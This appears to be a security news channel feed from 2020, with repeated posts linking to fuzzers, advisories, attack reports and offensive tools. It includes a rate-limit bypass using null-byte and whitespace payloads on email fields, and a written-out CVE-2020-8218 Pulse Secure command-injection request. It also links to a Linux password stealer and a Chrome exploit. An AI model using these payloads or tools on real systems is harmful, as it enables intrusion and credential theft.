Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email.
Not Works ?
Just try adding "blank space" on the email, works!
https://twitter.com/harrmahar/status/1247306384128872448
Not Works ?
Just try adding "blank space" on the email, works!
https://twitter.com/harrmahar/status/1247306384128872448
Twitter
Harrmahar
Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works! Alhamdulillah, Allah has willed it to me to got this on a Private Program. This my second…
Forwarded from Security Analysis
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
#CyberWar: Cyber attacks again hit Israel’s water system, shutting agricultural pumps. This is the second ICS-SCADA attack possibly by Iran 🇮🇷 in response to Stuxnet-2 attack by Israel/ United States.
https://www.timesofisrael.com/cyber-attacks-again-hit-israels-water-system-shutting-agricultural-pumps/
#Israel #UnitedStates #Iran #Stuxnet2
https://www.timesofisrael.com/cyber-attacks-again-hit-israels-water-system-shutting-agricultural-pumps/
#Israel #UnitedStates #Iran #Stuxnet2
The Times of Israel
Cyber attacks again hit Israel’s water system, shutting agricultural pumps
Incident follows more serious April attack attributed to Iran that officials said could have poisoned hundreds with chlorine
ICYMI: Browser based port scanner triggered via website.
https://defuse.ca/in-browser-port-scanning.htm
https://defuse.ca/in-browser-port-scanning.htm
defuse.ca
Port Scanning Local Network From a Web Browser
Malicious web pages can port scan your local network.
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities https://github.com/strongcourage/uafuzz #fuzzing
GitHub
GitHub - strongcourage/uafuzz: UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities - strongcourage/uafuzz
North Korean Malicious Cyber Activity: FASTCash
https://us-cert.cisa.gov/ncas/current-activity/2020/08/26/north-korean-malicious-cyber-activity-fastcash
via CISA Current Activity
https://us-cert.cisa.gov/ncas/current-activity/2020/08/26/north-korean-malicious-cyber-activity-fastcash
via CISA Current Activity
us-cert.cisa.gov
North Korean Malicious Cyber Activity: FASTCash | CISA
The Cybersecurity Security and Infrastructure Security Agency (CISA), the Department of the Treasury, the Federal Bureau of Investigation, and U.S. Cyber Command have released a joint Technical Alert and three Malware Analysis Reports (MARs) on the North…
monsoon - a fast and flexible HTTP enumerator written in Go
https://www.reddit.com/r/netsec/comments/ihmri6/monsoon_a_fast_and_flexible_http_enumerator/
via /r/netsec - Information Security News & Discussion
https://www.reddit.com/r/netsec/comments/ihmri6/monsoon_a_fast_and_flexible_http_enumerator/
via /r/netsec - Information Security News & Discussion
reddit
monsoon - a fast and flexible HTTP enumerator written in Go
Posted in r/netsec by u/RedTeamPentesting • 87 points and 27 comments
Example of Malicious DLL Injected in PowerShell, (Fri, Aug 28th)
https://isc.sans.edu/diary/rss/26512
https://isc.sans.edu/diary/rss/26512
In a new campaign...
Iranian hackers pose as journalists (over WhatsApp and LinkedIn) to trick high-value targets into handing over login credentials or installing spyware and steal sensitive information.
Read more: https://thehackernews.com/2020/08/hackers-journalist-malware.html
Iranian hackers pose as journalists (over WhatsApp and LinkedIn) to trick high-value targets into handing over login credentials or installing spyware and steal sensitive information.
Read more: https://thehackernews.com/2020/08/hackers-journalist-malware.html
Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
GitHub
Impost3r/README_EN.md at master · ph4ntonn/Impost3r
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
1day exploit for chrome version <= 83.0.4103.61
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
GitHub
GitHub - r4j0x00/exploits
Contribute to r4j0x00/exploits development by creating an account on GitHub.
CVE-2020-8218 : Pulse Secure SSL-VPN post-auth RCE
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
https://isc.sans.edu/diary/26254
Broken phishing accidentally exploiting Outlook zero-day
When we think of zero-days, what comes to mind are usually RCEs or other high-impact vulnerabilities. Zero-days, however, come in all shapes and sizes and many of them are low impact, as is the vulnerability we’re going to discuss today. What is interesting about it, apart from it allowing a sender of an e-mail to include/change a link in an e-mail when it is forwarded by Outlook, is that I noticed it being exploited in a low-quality phishing e-mail by what appears to be a complete accident.
#analysis #phishing #exploit
Broken phishing accidentally exploiting Outlook zero-day
When we think of zero-days, what comes to mind are usually RCEs or other high-impact vulnerabilities. Zero-days, however, come in all shapes and sizes and many of them are low impact, as is the vulnerability we’re going to discuss today. What is interesting about it, apart from it allowing a sender of an e-mail to include/change a link in an e-mail when it is forwarded by Outlook, is that I noticed it being exploited in a low-quality phishing e-mail by what appears to be a complete accident.
#analysis #phishing #exploit
SANS Internet Storm Center
Broken phishing accidentally exploiting Outlook zero-day
Broken phishing accidentally exploiting Outlook zero-day, Author: Jan Kopriva
Offensive security officialy announces it launch of dedicated lab play grounds with previous oscp retired machines added occasionally and upto 3hrs of free acess to all
https://www.offensive-security.com/labs/individual/?utm_campaign=Proving%20Grounds%20Individual&utm_content=138805717
https://www.offensive-security.com/labs/individual/?utm_campaign=Proving%20Grounds%20Individual&utm_content=138805717
OffSec
Proving Grounds: Practice - Starting at $19 USD/month | OffSec
Train your team's penetration testing skills in a hosted virtual lab network: the Proving Grounds. Now available for enterprise customers.
https://github.com/mxrch/penglab
Penglab
Penglab is a ready-to-install setup on Google Colab for cracking passwords with an incredible power, really useful for CTFs.
#tools #opensource #crack #gpu
Penglab
Penglab is a ready-to-install setup on Google Colab for cracking passwords with an incredible power, really useful for CTFs.
#tools #opensource #crack #gpu
GitHub
GitHub - mxrch/penglab: 🐧 Abuse of Google Colab for cracking hashes.
🐧 Abuse of Google Colab for cracking hashes. Contribute to mxrch/penglab development by creating an account on GitHub.